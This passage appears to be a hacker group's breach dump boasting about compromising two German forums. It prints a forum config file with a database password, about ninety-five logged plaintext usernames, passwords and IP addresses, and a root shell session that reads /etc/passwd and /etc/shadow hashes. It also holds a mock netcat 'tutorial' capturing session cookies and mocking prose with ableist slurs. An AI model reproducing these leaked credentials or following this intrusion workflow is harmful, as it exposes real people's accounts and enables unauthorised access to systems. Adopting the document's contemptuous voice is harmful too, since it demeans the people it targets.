-rwxr-xr-x 1 backspace www 9254 Jul 13 2010 image.php
drwxr-xr-x 23 backspace www 1024 Oct 18 18:37 images
drwxr-xr-x 6 backspace www 5120 Oct 18 18:45 includes
-rwxr-xr-x 1 backspace www 20263 Jul 13 2010 index.php
-rwxr-xr-x 1 backspace www 45036 Jul 13 2010 infraction.php
-rwxr-xr-x 1 backspace www 188547 Jul 13 2010 inlinemod.php
-rwxr-xr-x 1 backspace www 10545 Jul 13 2010 joinrequests.php
-rwxr-xr-x 1 backspace www 10441 Jul 13 2010 login.php
drwxr-xr-x 2 backspace www 512 Aug 24 07:54 madp
-rwxr-xr-x 1 backspace www 17502 Jul 13 2010 member.php
-rwxr-xr-x 1 backspace www 16333 Jul 13 2010 member_inlinemod.php
-rwxr-xr-x 1 backspace www 36930 Jul 13 2010 memberlist.php
drwxr-xr-x 6 backspace www 512 Aug 3 02:38 mgc_cb_evo
-rwxr-xr-x 1 backspace www 60012 May 17 2010 mgc_cb_evo.php
-rwxr-xr-x 1 backspace www 49992 Jun 28 16:36 mgc_cb_evo_ajax.php
-rwxr-xr-x 1 backspace www 24465 Jul 13 2010 misc.php
-rwxr-xr-x 1 backspace www 65182 Jul 13 2010 moderation.php
-rwxr-xr-x 1 backspace www 6855 Jul 13 2010 moderator.php
-rwxr-xr-x 1 backspace www 18967 Jul 13 2010 newattachment.php
-rwxr-xr-x 1 backspace www 38105 Jul 13 2010 newreply.php
-rwxr-xr-x 1 backspace www 19367 Jul 13 2010 newthread.php
-rwxr-xr-x 1 backspace www 20188 Jul 13 2010 online.php
-rwxr-xr-x 1 backspace www 7868 Jul 13 2010 payment_gateway.php
-rwxr-xr-x 1 backspace www 12193 Jul 13 2010 payments.php
drwxr-xr-x 11 backspace www 3072 Aug 3 03:20 pe54tr90321inij409839urei2954
-rwxr-xr-x 1 backspace www 8018 Jul 13 2010 picture.php
-rwxr-xr-x 1 backspace www 22661 Jul 13 2010 picture_inlinemod.php
-rwxr-xr-x 1 backspace www 25999 Jul 13 2010 picturecomment.php
-rwxr-xr-x 1 backspace www 28206 Jul 13 2010 poll.php
-rwxr-xr-x 1 backspace www 17744 May 12 2008 post_thanks.php
-rwxr-xr-x 1 backspace www 9691 Jul 13 2010 posthistory.php
-rwxr-xr-x 1 backspace www 76569 Jul 13 2010 postings.php
-rwxr-xr-x 1 backspace www 6702 Jul 13 2010 printthread.php
-rwxr-xr-x 1 backspace www 72783 Jul 13 2010 private.php
-rwxr-xr-x 1 backspace www 156809 Jul 13 2010 profile.php
drwxr-xr-x 2 backspace www 512 Aug 3 02:07 radio
-rwxr-xr-x 1 backspace www 40980 Jul 13 2010 register.php
-rwxr-xr-x 1 backspace www 5761 Jul 13 2010 report.php
-rwxr-xr-x 1 backspace www 14062 Jul 13 2010 reputation.php
-rwxr-xr-x 1 backspace www 30 Jun 30 09:52 robots.txt
-rwxr-xr-x 1 backspace www 128615 Oct 18 17:30 search.php
-rwxr-xr-x 1 backspace www 21546 Jul 13 2010 sendmessage.php
-rwxr-xr-x 1 backspace www 10263 Jul 13 2010 showgroups.php
-rwxr-xr-x 1 backspace www 12611 Jul 13 2010 showpost.php
-rwxr-xr-x 1 backspace www 75631 Jul 13 2010 showthread.php
drwxr-xr-x 2 backspace www 512 Aug 3 02:39 signaturepics
-rwxr-xr-x 1 backspace www 33846 Jul 13 2010 subscription.php
-rwxr-xr-x 1 backspace www 13671 Jul 13 2010 tags.php
-rwxr-xr-x 1 backspace www 8842 Jul 13 2010 threadrate.php
-rwxr-xr-x 1 backspace www 12706 Jul 13 2010 threadtag.php
-rwxr-xr-x 1 backspace www 35387 Jul 13 2010 usercp.php
-rwxr-xr-x 1 backspace www 19563 Jul 13 2010 usernote.php
-rwxr-xr-x 1 backspace www 28121 Jul 13 2010 visitormessage.php
-rwxr-xr-x 1 backspace www 19552 Jul 3 16:12 whitelist.dat
-rwxr-xr-x 1 backspace www 20463 Jun 19 12:07 whitelist.dat.bak
# find . -name ".ht*"
./pe54tr90321inij409839urei2954/libraries/.htaccess
./pe54tr90321inij409839urei2954/setup/frames/.htaccess
./pe54tr90321inij409839urei2954/setup/lib/.htaccess
# cat includes/config.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.8.6
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is C2000-2010 Jelsoft Enterprises Ltd. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/
/*-------------------------------------------------------*\
| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
+---------------------------------------------------------+
| If you get any errors while attempting to connect to |
| MySQL, you will need to email your webhost because we |
| cannot tell you the correct values for the variables |
| in this file. |
\*-------------------------------------------------------*/
// ****** DATABASE TYPE ******
// This is the type of the database server on which your vBulletin database will be located.
// Valid options are mysql and mysqli, for slave support add _slave. Try to use mysqli if you are using PHP 5 and MySQL 4.1+
// for slave options just append _slave to your preferred database type.
$config['Database']['dbtype'] = 'mysql';
// ****** DATABASE NAME ******
// This is the name of the database where your vBulletin will be located.
// This must be created by your webhost.
$config['Database']['dbname'] = 'backspace_forum';
// ****** TABLE PREFIX ******
// Prefix that your vBulletin tables have in the database.
$config['Database']['tableprefix'] = '';
// ****** TECHNICAL EMAIL ADDRESS ******
// If any database errors occur, they will be emailed to the address specified here.
// Leave this blank to not send any emails when there is a database error.
$config['Database']['technicalemail'] = 'info@unique-crew.net';
// ****** FORCE EMPTY SQL MODE ******
// New versions of MySQL (4.1+) have introduced some behaviors that are
// incompatible with vBulletin. Setting this value to "true" disables those
// behaviors. You only need to modify this value if vBulletin recommends it.
$config['Database']['force_sql_mode'] = false;
// ****** MASTER DATABASE SERVER NAME AND PORT ******
// This is the hostname or IP address and port of the database server.
// If you are unsure of what to put here, leave the default values.
$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['port'] = 3306;
// ****** MASTER DATABASE USERNAME & PASSWORD ******
// This is the username and password you use to access MySQL.
// These must be obtained through your webhost.
$config['MasterServer']['username'] = 'backspace_forum';
$config['MasterServer']['password'] = 'xyzsSgasSJ33';
// ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
// This option allows you to turn persistent connections to MySQL on or off.
// The difference in performance is negligible for all but the largest boards.
// If you are unsure what this should be, leave it off. (0 = off; 1 = on)
$config['MasterServer']['usepconnect'] = 0;
// ****** SLAVE DATABASE CONFIGURATION ******
// If you have multiple database backends, this is the information for your slave
// server. If you are not 100% sure you need to fill in this information,
// do not change any of the values here.
$config['SlaveServer']['servername'] = '';
$config['SlaveServer']['port'] = 3306;
$config['SlaveServer']['username'] = '';
$config['SlaveServer']['password'] = '';
$config['SlaveServer']['usepconnect'] = 0;
// ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
// This setting allows you to change the name of the folders that the admin and
// moderator control panels reside in. You may wish to do this for security purposes.
// Please note that if you change the name of the directory here, you will still need
// to manually change the name of the directory on the server.
$config['Misc']['admincpdir'] = 'bnig459832zhbuiwedzouz9012vgr932';
$config['Misc']['modcpdir'] = 'g76893bh2b21z32v3g5vd7x8f78f43h';
// Prefix that all vBulletin cookies will have
// Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
$config['Misc']['cookieprefix'] = 'uc';
// ******** FULL PATH TO FORUMS DIRECTORY ******
// On a few systems it may be necessary to input the full path to your forums directory
// for vBulletin to function normally. You can ignore this setting unless vBulletin
// tells you to fill this in. Do not include a trailing slash!
// Example Unix:
// $config['Misc']['forumpath'] = '/home/users/public_html/forums';
// Example Win32:
// $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
$config['Misc']['forumpath'] = '';
// ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
// The users specified here will be allowed to view the admin log in the control panel.
// Users must be specified by *ID number* here. To obtain a user's ID number,
// view their profile via the control panel. If this is a new installation, leave
// the first user created will have a user ID of 1. Seperate each userid with a comma.
$config['SpecialUsers']['canviewadminlog'] = '2, 1955';
// ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
// The users specified here will be allowed to remove ("prune") entries from the admin
// log. See the above entry for more information on the format.
$config['SpecialUsers']['canpruneadminlog'] = '2, 1955';
// ****** USERS WITH QUERY RUNNING PERMISSIONS ******
// The users specified here will be allowed to run queries from the control panel.
// See the above entries for more information on the format.
// Please note that the ability to run queries is quite powerful. You may wish
// to remove all user IDs from this list for security reasons.
$config['SpecialUsers']['canrunqueries'] = '';
// ****** UNDELETABLE / UNALTERABLE USERS ******
// The users specified here will not be deletable or alterable from the control panel by any users.
// To specify more than one user, separate userids with commas.
$config['SpecialUsers']['undeletableusers'] = '1955';
// ****** SUPER ADMINISTRATORS ******
// The users specified below will have permission to access the administrator permissions
// page, which controls the permissions of other administrators
$config['SpecialUsers']['superadministrators'] = '1955, 1000003';
// ****** DATASTORE CACHE CONFIGURATION *****
// Here you can configure different methods for caching datastore items.
// vB_Datastore_Filecache - to use includes/datastore/datastore_cache.php
// vB_Datastore_APC - to use APC
// vB_Datastore_XCache - to use XCache
// vB_Datastore_Memcached - to use a Memcache server, more configuration below
// $config['Datastore']['class'] = 'vB_Datastore_XCache';
// ******** DATASTORE PREFIX ******
// If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
// than one set of forums installed on your host, you *may* need to use a prefix
// so that they do not try to use the same variable within the cache.
// This works in a similar manner to the database table prefix.
// $config['Datastore']['prefix'] = '';
// It is also necessary to specify the hostname or IP address and the port the server is listening on
/*
$config['Datastore']['class'] = 'vB_Datastore_Memcached';
$i = 0;
// First Server
$i++;
$config['Misc']['memcacheserver'][$i] = '127.0.0.1';
$config['Misc']['memcacheport'][$i] = 11211;
$config['Misc']['memcachepersistent'][$i] = true;
$config['Misc']['memcacheweight'][$i] = 1;
$config['Misc']['memcachetimeout'][$i] = 1;
$config['Misc']['memcacheretry_interval'][$i] = 15;
*/
// ****** The following options are only needed in special cases ******
// ****** MySQLI OPTIONS *****
// When using MySQL 4.1+, MySQLi should be used to connect to the database.
// If you need to set the default connection charset because your database
// is using a charset other than latin1, you can set the charset here.
// If you don't set the charset to be the same as your database, you
// may receive collation errors. Ignore this setting unless you
// are sure you need to use it.
// $config['Mysqli']['charset'] = 'cp1251';
// Optionally, PHP can be instructed to set connection parameters by reading from the
// file named in 'ini_file'. Please use a full path to the file.
// Example:
// $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
$config['Mysqli']['ini_file'] = '';
// Image Processing Options
// Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
$config['Misc']['maxwidth'] = 2592;
$config['Misc']['maxheight'] = 1944;
/*======================================================================*\
|| ####################################################################
|| # CVS: $RCSfile$ - $Revision: 28757 $
|| ####################################################################
\*======================================================================*/
#
Here we also decided to log some plaintext passwords. Plaintexts are
always fun, aren't they? But no worries, we only logged for a few
hours, so there aren't that many.
*zone:123alles:77.191.88.127:18.10.2011 21:11:13
-=Re@p3r=-:uc4ever:95.33.189.150:19.10.2011 15:26:08
1024byte:UW:1+1=2Es3l:77.180.109.31:20.10.2011 15:01:29
3pic:xy200xyx:62.212.72.166:18.10.2011 21:51:10
3xpl01t:dg4x0da78k:188.155.227.158:20.10.2011 14:39:34
@lpha:skynet:62.212.72.166:20.10.2011 14:48:01
Aram!s:123456789:77.10.184.143:18.10.2011 19:48:34
Back_Space:dsfo4509slö76s22:84.148.249.89:20.10.2011 13:42:10
BlackWindow:safran12:80.218.203.53:18.10.2011 21:18:13
Blackdragón:S!D§K!CKsaz51atl:91.6.204.225:18.10.2011 22:51:30
CR3ATIVE 0N3:12345678uc:173.0.10.191:19.10.2011 11:21:25
Connection:1479mlpi257!/24:84.19.169.232:19.10.2011 10:57:51
Cyber Tjak:5cNCPg8Z/W>[L?/E&C%\}:O\26z5:y4:178.1.185.84:19.10.2011 12:55:10
DeCode:hacker63:109.169.135.87:19.10.2011 11:10:09
Der_Visitor:CMqxwGz0:46.115.3.148:20.10.2011 10:57:27
DrJack:UQDrJack123!!!:178.192.41.12:19.10.2011 08:26:33
Duellking:uc4ever:129.143.71.37:20.10.2011 14:24:00
Einfachnurso:Mg7BjyKR:217.191.194.28:19.10.2011 11:20:10
Follow:cX1AKuJJ:85.16.149.79:19.10.2011 08:43:55
Gevara:asdf1337:217.255.229.5:18.10.2011 18:48:26
Goa:5852663:95.211.99.92:18.10.2011 21:04:28
Hammer:trevilor:87.161.89.187:18.10.2011 19:32:20
IcEcRacKer:Kleinestier1?:93.132.65.222:19.10.2011 17:38:05
Imkon:chaoslegion:91.53.193.95:19.10.2011 11:44:18
Ke3per:anatoxis123:87.173.50.42:19.10.2011 13:53:02
LiipTon:JCGDDz3X:178.3.209.11:18.10.2011 19:31:23
Locke:14041987:31.18.173.100:19.10.2011 10:38:30
LuRez:furz90:92.73.124.178:20.10.2011 10:12:08
Marcello:nokian81:94.221.186.74:19.10.2011 16:18:33
MenoX:aXnHmVz8:87.152.221.177:18.10.2011 18:54:59
Miss.Marple:werder:31.19.76.171:19.10.2011 18:27:33
Mxxt:unique12345:78.54.158.153:19.10.2011 19:20:52
NEO_2.0:4455jljlacdcr111dth11+sdp:93.204.88.95:18.10.2011 20:22:38
PaxyundFixy:123lolen:92.225.54.141:19.10.2011 16:47:03
Schlauchbraten:area51:217.255.234.154:20.10.2011 00:51:49
Sektor63:Penis123456789:213.232.200.163:20.10.2011 11:30:16
Sirius.GER:rolexblingbling@2:79.172.193.89:18.10.2011 20:37:49
SpeedyGamer:f3LBPKMb:46.5.95.105:18.10.2011 20:39:09
Style:asdasd:91.53.233.106:19.10.2011 15:29:29
V0rteX:YSAcXgM1:94.219.12.253:19.10.2011 16:30:35
Vague:hardtek1985:88.153.146.195:19.10.2011 22:35:24
Yakuza112:N4DdSHXh:80.130.164.16:18.10.2011 19:02:12
aNd5:dfWA5txY:178.201.106.152:20.10.2011 11:53:04
bananabob:davidov:87.163.56.254:18.10.2011 21:12:59
bert:Fk4feKyr:95.223.89.222:20.10.2011 15:28:21
biohazard:21539868:62.224.66.21:20.10.2011 10:21:54
cheesi:strike299:80.109.55.18:19.10.2011 20:22:29
crone:41MkHjee:62.212.72.166:19.10.2011 16:40:40
cyx:cyxcyx:78.94.200.138:18.10.2011 21:00:25
ee46hxe6x:drdtdrtdrt6666666666666:87.172.237.175:20.10.2011 07:41:03
furz:Dreadfg:192.162.103.27:20.10.2011 03:19:05
gevara:asdf1337:92.241.168.23:19.10.2011 17:47:24
ghostleader:Scorpion:82.195.232.218:19.10.2011 17:39:20
hardcore4life:dx5U5ZPu:82.72.183.168:19.10.2011 21:53:40
haxxer:lollol123:92.203.66.182:19.10.2011 01:43:21
icle:gt54rfvvgt54rfvv:88.130.162.238:18.10.2011 20:34:58
impiety:pa44word:113.211.166.68:19.10.2011 02:22:47
john:picture:93.222.62.165:20.10.2011 09:51:40
junkfood:xxxxxx:87.230.10.135:20.10.2011 10:20:15
justnew:myw00t1337:87.146.39.153:19.10.2011 14:17:00
kathi1337:yousuck:79.212.132.144:20.10.2011 04:21:23
killuthekid7:123456:94.220.222.124:19.10.2011 22:50:27
king99:h5ZZKXvN:85.178.239.47:18.10.2011 20:12:06
klerus:kl12er34us56654321:85.176.101.243:19.10.2011 15:05:24
l5xx!z:mattrex123.:77.3.81.189:19.10.2011 18:08:37
laberpaul:123123:178.63.231.103:19.10.2011 18:43:47
lerox:hallo123:79.255.147.179:19.10.2011 20:25:04
lyrix:mixxedup:77.117.163.186:19.10.2011 21:42:34
mAlCoM:squier:95.89.170.234:19.10.2011 06:28:27
mayh3m:electronic:196.46.189.162:19.10.2011 15:09:42
meineex:meine1978$:93.218.235.254:20.10.2011 08:31:41
misterini:brumau:213.196.253.37:20.10.2011 06:13:22
mr_euro:manfred--:186.16.12.187:18.10.2011 21:31:03
mute:88klaus88:87.153.35.90:19.10.2011 12:55:42
n0mac:wru5UHUp:77.177.13.199:19.10.2011 17:32:38
p3x:gzuogoui:93.209.47.197:19.10.2011 21:03:10
p4inw4r:IoJS91jS__passwort_loging_ist_total_gay__Dj13DDAD:212.117.180.81:18.10.2011 19:36:50 << YOU BET!
protoliner:bremen12:178.142.52.54:20.10.2011 09:29:57
sector40000:yqaBvJms:84.170.29.212:18.10.2011 20:33:34
smartie0:q0120660:77.188.215.212:19.10.2011 09:02:28
smurf:120684:217.91.85.183:19.10.2011 17:02:53
sperle:45er87qw:89.246.204.213:20.10.2011 00:55:26
st3aLth:1337!Aa:109.192.209.243:18.10.2011 18:46:06
stryder:v6e6fbun:188.175.134.98:19.10.2011 17:59:48
style:asdasd:91.53.233.106:19.10.2011 21:31:58
sys32:wowanda85:119.42.144.18:20.10.2011 11:26:54
txto:123456:188.98.215.91:18.10.2011 22:26:54
voodoo:allianz3:91.62.186.36:19.10.2011 20:05:36
wacked:ynWgX0HT:84.140.226.167:18.10.2011 18:51:35
whiti:matrix123:84.169.182.65:19.10.2011 22:25:21
xGh0sT:oberbaer1:77.178.33.108:18.10.2011 20:48:23
zero334:uc4ever:213.163.64.43:19.10.2011 13:31:24
zocker:qwertzui:77.178.217.145:20.10.2011 14:44:07
zulu:Pod88ucC2011:80.152.154.125:20.10.2011 06:17:27
,;~;,
/\_
( /
(() //)
| \\ ,,;;'\
__ _( )m=((((((((((((((====={ Zion-Network.net }======-------
/' ' '()/~' '.(, |
,;( )|| | ~ Zion-Network.net was not so easy to hack. It
,;' \ /-(.;, ) took about ten minutes longer because they were
) / ) / running some reverse http proxy, so we clueless-
// || ly got root on that one first, just to find out
)_\ )_\ that we did not own the right box. We allow you
to laugh at us now. Anyway Zion-Network has been breeding kiddies and
carder blockheads for quite a while and it has long been rumored that
we already backdoored them a long time ago. But sorry, no, we had
other business, too, for example consuming alcohol as if there is no
tomorrow. Maybe that's why we failed with that reverse proxy.
Nevertheless it was about damn time to own them. The members of
Zion-Network are a lot dumber than the other average carding offscum,
hardly surprising that they rip off each other to the utmost.
Zion-Network has been growing immensely so you can not only buy credit
cards or ID card scans on Zion-Network's trading area, but also all
sorts of drugs like coke, lsd, mushrooms or crystal. A rather large
drug scene has emerged that fulfills everybody's wishes. Great shit
for the average 14 year old scammer who sees himself as the greatest
but is not able to tie up his own shoes without tripping over himself.
Pride and ignorance are akin. And this fact is clearly described by
the administration of Zion. LUCIFER aka S3TH, the current
administrator announces the following after they applied some
innovations to the community.
____________________________________________________________________
| __ __ |
| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
| | _ | | | _ || _| -__|| _ | _ |_ _| |
| |__ |_____|_____||____|_____||_____|_____|__.__| |
|________|__|________________________________________________________|
| |
| LUCIFER: Bereiche wie Security & Hacking sowie Coding wurden dabei |
| besonders berücksichtigt, damit Fraud nicht mehr |
| dominiert, sondern sich mit NonFraud ungefähr die Waage |
| hält. |
| |
|____________________________________________________________________|
LUCIFER alleges that they particularly considered security, hacking
and coding categories while redesigning the messageboard so that
there'd be a balanced ratio of fraud and non fraud on the forums. That
is some heavily retarded noble endeavor of trying to bring fraud and
HACKING on the same level. We diagnose Down's syndrome or some other
mental disability as he clearly fails to acknowledge that there is not
even the slightest connection between fraud and hacking.
____________________________________________________________________
| __ __ |
| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
| | _ | | | _ || _| -__|| _ | _ |_ _| |
| |__ |_____|_____||____|_____||_____|_____|__.__| |
|________|__|________________________________________________________|
| |
| LUCIFER: Die Hacker-Szene wird immer falsch dargestellt, das ist |
| nichts neues. Gesteigerte Gefahr für Zion sehe ich |
| dadurch nicht, wir sind sowieso schon das groesste |
| deutschsprachige Szene-Board und haben allein deswegen |
| schon seit geraumer Zeit juristische Aufmerksamkeit. |
| |
|____________________________________________________________________|
We are really asking ourselves what this guy understands by the term
"Hacking-Scene". It's time to teach them a lesson in order to make
them see their own "Hacking-Scene" shatter to thousand stinking
pieces. Since the rest of the team also shows a great deal of
stupidity, that it is not even possible to show a minimal amount of
mercy. We do not want to waste time discussing that here, you better
have a look at their database backups.
Oh by the way, we heard that some of you guys are interested in our
ninja techniques of breaking in without being noticed. So today we
will give you a 0day tutorial about how to hax a server behind a
reverse http proxy (means you need access to the proxy):
# nc -vl 80
Now wait....
GET /board/showthread.php?t=37267 HTTP/1.1
Host: zion-network.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://zion-network.net/board/forum.php
Cookie: bb_lastvisit=1313843209; bb_lastactivity=0; bb_userid=758; bb_password=cbb1acdccd3eefbe2f3adcf4242aa561; vbulletin_collapse=c_thanks_post194596%0Ac_thanks_post196652%0Ac_thanks_post199529; IDstack=lSuObiA%3D; bb_sessionhash=39f517118ecb0ba168105281205e0a59; bb_np_notices_displayed=6; bb_thread_lastview=751d55ed819e2ad0067fbca46f48afd1ccdfededa-16-%7Bi-35252_i-1317570965_i-34784_i-1317564637_i-37212_i-1317563932_i-37236_i-1317563385_i-37200_i-1317559780_i-37227_i-1317557248_i-37177_i-1317549825_i-37217_i-1317548469_i-37211_i-1317546730_i-37180_i-1317537132_i-37184_i-1317517400_i-36756_i-1317514332_i-35132_i-1317466004_i-37190_i-1317511102_i-36548_i-1317463629_i-36054_i-1317581261_%7D; sitechrx=a5f531169bad3dcf2c7789c566346005
^C
#
DONE! Of course we don't need to rely on such methods, we simply do
something like this:
|\ .(' *) ' ....................
| \ ' .*) .'* $ ./getroot zion-network.net
|(*\ .*(// .*) .# id ......................
|___\ // (. '*.# uid=0(root)...
((("'\ // ' * ..........
((c'7') /\) ,. . .,
((((^)) / \ ,. ,,
.-')))(((-' / ,
(((()) __/'
)))( |
(()
))
It's black magic ... can you smell the fume? ...
# uname -a
Linux u204 2.6.32-5-amd64 #1 SMP Sun Sep 25 16:21:44 UTC 2011 x86_64 GNU/Linux
# cat /etc/issue
Debian GNU/Linux 6.0 \n \l
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
ntp:x:105:107::/home/ntp:/bin/false
messagebus:x:106:108::/var/run/dbus:/bin/false
dfg435345fgu03:x:1001:1001:,,,:/home/dfg435345fgu03:/bin/bash
# cat /etc/shadow
root:$6$k1ECC7.L$tYZOWc8NqRaq/RGds7SIVu3IYI/oxd5IVvS1cYlR7S/kK0CrtC1o7howFMQS5gNe3FyPkXLZVA9yiyKy7LRV51:15248:0:99999:7:::
daemon:*:15248:0:99999:7:::
bin:*:15248:0:99999:7:::
sys:*:15248:0:99999:7:::
sync:*:15248:0:99999:7:::
games:*:15248:0:99999:7:::
man:*:15248:0:99999:7:::
lp:*:15248:0:99999:7:::
mail:*:15248:0:99999:7:::
news:*:15248:0:99999:7:::
uucp:*:15248:0:99999:7:::
proxy:*:15248:0:99999:7:::
www-data:*:15248:0:99999:7:::
backup:*:15248:0:99999:7:::
list:*:15248:0:99999:7:::
irc:*:15248:0:99999:7:::
gnats:*:15248:0:99999:7:::
nobody:*:15248:0:99999:7:::
libuuid:!:15248:0:99999:7:::
Debian-exim:!:15248:0:99999:7:::
statd:*:15248:0:99999:7:::
sshd:*:15248:0:99999:7:::
user:$6$/0FK/.iX$k9qkCt7AzvwIYu1yN/ofroZCzmivenSDgPzTFnPY36XeAqcF4a6vUyFSbCMAHqz61L5roXdK1nWBn.wcE89U5/:15248:0:99999:7:::
mysql:!:15248:0:99999:7:::
ntp:*:15248:0:99999:7:::
messagebus:*:15248:0:99999:7:::
dfg435345fgu03:$6$vMjSRgiC$iY1hSMMP3mHyCqRyEGtqfqTuDFyPwtdVvn/0zZXsu8B2mJMwAURxmZjtkF9xgmSO02alaVBlme.NrW1gTS5cl1:15248:0:99999:7:::
# last
root pts/0 host-static-93-1 Thu Oct 13 03:48 gone - no logout
root pts/0 178.122.33.104 Wed Oct 12 03:58 - 03:48 (23:50)
root pts/0 83.246.185.93 Tue Oct 4 22:47 - 03:58 (7+05:11)
root pts/0 83.246.185.93 Tue Oct 4 22:46 - 22:47 (00:01)
root pts/0 83.246.185.93 Tue Oct 4 22:44 - 22:46 (00:01)
root pts/0 83.246.185.93 Tue Oct 4 22:43 - 22:44 (00:00)
root pts/0 83.246.185.93 Tue Oct 4 22:38 - 22:43 (00:04)
root pts/0 83.246.185.93 Tue Oct 4 22:37 - 22:38 (00:01)
root pts/0 85.121.52.21 Tue Oct 4 22:20 - 22:37 (00:16)
root pts/0 178.124.12.137 Tue Oct 4 22:14 - 22:20 (00:06)
root pts/0 188.24.19.198 Tue Oct 4 20:19 - 22:14 (01:55)
root pts/0 188.24.19.198 Tue Oct 4 20:16 - 20:19 (00:02)
root pts/1 80.242.104.93 Sun Oct 2 17:55 gone - no logout
root pts/1 80.242.104.93 Sun Oct 2 17:43 - 17:55 (00:11)
root pts/3 79.112.62.66 Sun Oct 2 16:11 gone - no logout
root pts/0 80.242.104.93 Sun Oct 2 14:50 - 20:16 (2+05:25)
# alias ls="ls -la"
# ls
total 64
drwx------ 3 root root 4096 Oct 2 14:12 .
drwxr-xr-x 22 root root 4096 Oct 1 09:23 ..
drwx------ 2 root root 4096 Oct 1 09:23 .aptitude
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 140 Nov 19 2007 .profile
-rwxrwxrwx 1 root root 41394 Oct 1 17:16 mysqltuner.pl
# cd /home
# ls
total 16
drwxr-xr-x 4 root root 4096 Oct 1 18:32 .
drwxr-xr-x 22 root root 4096 Oct 1 09:23 ..
drwxr-xr-x 2 dfg435345fgu03 dfg435345fgu03 4096 Oct 2 14:20 dfg435345fgu03
drwxr-xr-x 2 user user 4096 Oct 1 09:24 user
# cd dfg435345fgu03
# ls
total 20
drwxr-xr-x 2 dfg435345fgu03 dfg435345fgu03 4096 Oct 2 14:20 .
drwxr-xr-x 4 root root 4096 Oct 1 18:32 ..
-rw-r--r-- 1 dfg435345fgu03 dfg435345fgu03 220 Oct 1 18:32 .bash_logout
-rw-r--r-- 1 dfg435345fgu03 dfg435345fgu03 3184 Oct 1 18:32 .bashrc
-rw-r--r-- 1 dfg435345fgu03 dfg435345fgu03 675 Oct 1 18:32 .profile
# cd ..
# cd user
# ls
total 20
drwxr-xr-x 2 user user 4096 Oct 1 09:24 .
drwxr-xr-x 4 root root 4096 Oct 1 18:32 ..
-rw-r--r-- 1 user user 220 Oct 1 09:24 .bash_logout
-rw-r--r-- 1 user user 3184 Oct 1 09:24 .bashrc
-rw-r--r-- 1 user user 675 Oct 1 09:24 .profile
# Nothing to see here :(^C
# cd /var/www
# ls
total 20
drwxr-xr-x 3 www-data www-data 4096 Oct 1 18:49 .
drwxr-xr-x 16 root root 4096 Oct 2 14:37 ..
drwxr-xr-x 17 root root 4096 Oct 2 14:25 board
-rw-r--r-- 1 root root 111 Oct 2 05:54 index.php
-rw-r--r-- 1 root root 1200 Oct 2 04:29 robots.txt
# cd board
# ls -la
total 2604
drwxr-xr-x 17 root root 4096 Oct 2 14:25 .
drwxr-xr-x 3 www-data www-data 4096 Oct 1 18:49 ..
-rw-r--r-- 1 root root 12292 May 17 2010 .DS_Store
-rw-r--r-- 1 root root 70 May 17 2010 ._.DS_Store
-rw-r--r-- 1 root root 19541 Sep 24 11:16 LICENSE
-rw-r--r-- 1 root root 44905 Sep 24 11:16 ajax.php
-rw-r--r-- 1 root root 75977 Sep 24 11:16 album.php
-rw-r--r-- 1 root root 19375 Sep 24 11:16 announcement.php
-rw-r--r-- 1 root root 4269 Sep 24 11:16 api.php
-rw-r--r-- 1 root root 3862 Sep 24 11:16 apichain.php
drwxr-xr-x 2 root root 4096 Oct 1 15:06 archive
-rw-r--r-- 1 root root 8745 Sep 24 11:16 asset.php
-rw-r--r-- 1 root root 20438 Sep 24 11:16 assetmanage.php
-rw-r--r-- 1 root root 15831 Sep 24 11:16 attachment.php
-rw-r--r-- 1 root root 6690 Sep 24 11:16 attachment_inlinemod.php
-rw-r--r-- 1 root root 1960 Sep 25 10:03 banlist.php
